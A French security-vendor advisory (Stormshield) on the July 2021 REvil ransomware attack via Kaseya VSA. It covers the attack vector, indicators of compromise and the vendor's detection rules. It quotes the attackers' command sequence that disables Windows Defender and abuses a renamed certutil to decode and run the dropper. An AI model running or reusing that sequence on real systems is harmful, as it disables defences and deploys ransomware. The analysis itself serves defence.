Alerté sécurité Kaseya VSA : la réponse des produits Stormshield

Cyberattaque contre Kaseya VSA, explications | Stormshield

Début juillet 2021, plusieurs centaines d’entreprises sont victimes d’une attaque par ransomware. Une attaque qui aurait transité par un logiciel de gestion IT, VSA, propriété de l’entreprise américaine Kaseya. Le point sur une nouvelle cyberattaque d’envergure.

 

Le contexte de l'attaque

Le 2 juillet, des chercheurs de Huntress Labs ont découvert une nouvelle vague de ransomware sur plusieurs centaines d’entreprises. À l’origine de la cyberattaque, la compromission du logiciel de gestion VSA, propriété de l’entreprise Kaseya. Une attaque confirmée par l’éditeur dans une déclaration publiée le même jour sur son site web et attribuée pour le moment au groupe de cyber-criminels REvil.

Ce logiciel, déployé en SaaS, est utilisé pour superviser et gérer les systèmes d’information de dizaine de milliers de clients dans le monde. Sa compromission permet théoriquement aux cyber-criminels de compromettre l’ensemble des Service Provider revendeurs et leurs clients, soit aujourd’hui respectivement 40 et 1 000 entreprises, pour un total d’environ 1 million d’environnements. D’après les premiers éléments, il semblerait qu’au moins 60 clients soient déjà victimes de chiffrement, au moment où les membres du groupe REvil demandent une rançon de 70 millions de dollars contre la clé de déchiffrement.

 

Le vecteur initial de l'attaque

La compromission initiale de l’outil VSA semble avoir été réalisée par une injection SQL Zero-Day sur les servers frontaux Internet de VSA. Des serveurs utilisés pour la mise à jour des agents locaux de supervision de Kaseya (Agent Monitor).

La compromission du client final a, elle, été directement réalisée via l’outil Kaseya Agent Monitor, qui effectue lui-même le téléchargement depuis le VSA, présenté sous forme de Hotfix. Cet agent est exécuté dans un espace où l’analyse antivirale est désactivée (sur recommandation de Kaseya…), rendant l’exécution du malware aisé. Il est ensuite diffusé sur l’ensemble du SI, toujours via l’outil VSA.

 

Les détails techniques de l'attaque

Déploiement

Le dropper est chargé par l’Agent Monitor sous le nom AGENT.CRT dans le répertoire de mise à jour c:\Kworking\. L’Agent Monitor exécute ensuite les commandes suivantes :

ping 127.0.0.1 -n 7000 > nul
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe
echo %RANDOM% >> C:\Windows\cert.exe
C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking1\agent.exe
del /q /f c:\kworking\agent.crt C:\Windows\cert.exe
c:\kworking\agent.exe

Ces différentes commandes permettent de désactiver Windows Defender et d’utiliser cert.exe pour décoder le dropper.

Une fois exécuté, le logiciel AGENT.EXE charge un autre exécutable MSMPENG.EXE, signé par Microsoft afin de réaliser une « side-channel attaque » en chargeant le DLL corrompu MSMPENG.DLL.

Obfuscation

L’obfuscation est réalisée par un encodage en base 64. Mais le malware étant téléchargé dans un répertoire où l’antivirus est censé ne pas être actif, et via un flux « officiel » du logiciel, cette obfuscation n’est pas primordiale.

Chiffrement

Le ransomware et sa propagation sont ceux utilisés habituellement par REvil, à savoir Sodinokibi. Le chiffrement est réalisé sur les mêmes secteurs de disque que les documents sources, rendant impossible la récupération par analyse de disque.

IoC

IP source de l’exploit Zero-day sur le serveur VSA :

  • 161[.]35[.]239[.]148
  • 35[.]226[.]94[.]113
  • 162[.]253[.124[.]162
  • 18[.]223[.]199[.]234

Noms de fichiers sur les postes :

  • AGENT.EXE
    D55F983C994CAA160EC63A59F6B4250FE67FB3E8C43A388AEC60A4A6978E9F1E
  • MPSVC.DLL
    8DD620D9AEB35960BB766458C8890EDE987C33D239CF730F93FE49D90AE759DD
  • AGENT.CRT
    45AEBD60E3C4ED8D3285907F5BF6C71B3B60A9BCB7C34E246C20410CF678FC0C

Clé de registre :

  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\BlackLivesMatter

L’utilisation d’un certificat signé par : PB03 TRANSPORT LTD

 

Les protections Stormshield

Ci-dessous, le détail des recommandations de configuration Stormshield et le détail de nos protections spécifiques à déployer.

Jeux de règles et signatures

1. SNS

Le jeu de signatures http:mix.337 et http:client.74 permet de protéger les serveurs Kaseya VSA contre la compromission initiale. La http:mix.337 détecte les requêtes Curl à destination du serveur, et la http:client.74 détecte le contenu des fichiers malveillants uploadé sur le serveur. Ces signatures sont automatiquement disponibles dans la configuration du SNS après l’auto-update.

Veuillez noter qu’elle nécessite que le flux soit déchiffré, par un équipement spécialisé (reverse-proxy, TAP de déchiffrement…), pour être efficace.

2. SES 7.2

SES 7.2 nécessite une configuration spécifique pour bloquer cette attaque. Pour cela, nous avons développé un pack de protection pour SES 7.2, téléchargeable sur mystormshield.eu, comprenant :

  • L’autorisation d’exécution de l’exécutable agent fourni par la société Huntress ;
  • Le blocage de la création et de l’exécution des différents binaires malveillants (cert.exe, msmpeng.exe, mpsvc.dll, agent.exe, agent.crt) utilisés pour cette attaque. Cette identification se base sur plusieurs critères : chemins, hash ou encore la signature par le certificat délivré à “PB03 TRANSPORT LTD.” ;
  • Tout accès aux clés de registre spécifiques au ransomware Sodinokibi utilisé pendant l’attaque.

La politique fournie permet donc de bloquer l’attaque à de nombreux niveaux, empêchant avec certitude toute exécution du ransomware.

3. SES Evolution

La version disponible de SES Evolution, la 2.0.2, nécessite un jeu de règles spécifique pour bloquer cette attaque.

Afin de simplifier le déploiement, nous avons développé un pack de protection SES Evolution 2.0 spécifique qui intègre l’ensemble des protections du pack pour SES 7.2 et y ajoute le contrôle du chargement de la DLL malveillante et affine le contexte d’exécution du processus agent.exe. Tout comme SES 7.2, SES Evolution permet de bloquer l’attaque à de nombreux niveaux, empêchant avec certitude toute exécution du ransomware.

Fig1 : politique de protection contre l’exploit Kaseya

Avec la future version 2.1.0, disponible courant juillet, la nouvelle protection par corrélation dédiée à la détection de l’usage malveillant de l’outil certutil sera capable de bloquer ce type d’attaque nativement.

Fig2 : log de détection de l’attaque sur la version 2.1.0, sans protection spécifique

 

Recommandations de configuration

1. SNS

Nous recommandons de blacklister les quatre adresses IPs listées en IoC directement en entrée de votre réseau.

2. SES 7.2

Pas de recommandation particulière.

3. SES Evolution

Pas de recommandation particulière, à noter que la future version 2.2 de SES Evolution intégrera un moteur spécifique de détection de ransomware générique, en plus des différentes protections déjà existantes empêchant le fonctionnement des droppers.

 

Autres recommandations

Nous recommandons d’utiliser le script de détection de compromission de Kaseya, disponible ici : kaseya.app.box.com/s/0ysvgss7w48nxh8k1xt7fqhbcjxhas40

Partager sur

[juiz_sps buttons="facebook, twitter, linkedin, mail"]
Une question plus technique sur le sujet ? Un besoin de précision sur les protections Stormshield ? Les équipes du Support Technique sont à votre disposition pour vous accompagner au mieux. Contactez-les par le biais du gestionnaire d’incidents situé dans l’espace privé MyStormshield. Pour y accéder, sélectionnez le menu « Support technique / Rapporter un incident / Suivre un incident ».

À propos de l'auteur

mm
Sébastien Viou
Directeur Cybersécurité Produits & Cyber-Évangeliste, Stormshield

Adepte des sports de combats (ju-jitsu, kick-boxing, hockey sur glace), Sébastien se passionne également pour la mécanique. La vraie, celle où on démonte et remonte toutes les pièces jusqu'à en comprendre tous les mécanismes. Un parallèle évident avec ses missions chez Stormshield, où il est en charge d'apporter un éclairage sur les évolutions, les innovations et les tendances sur les cyber-menaces du moment.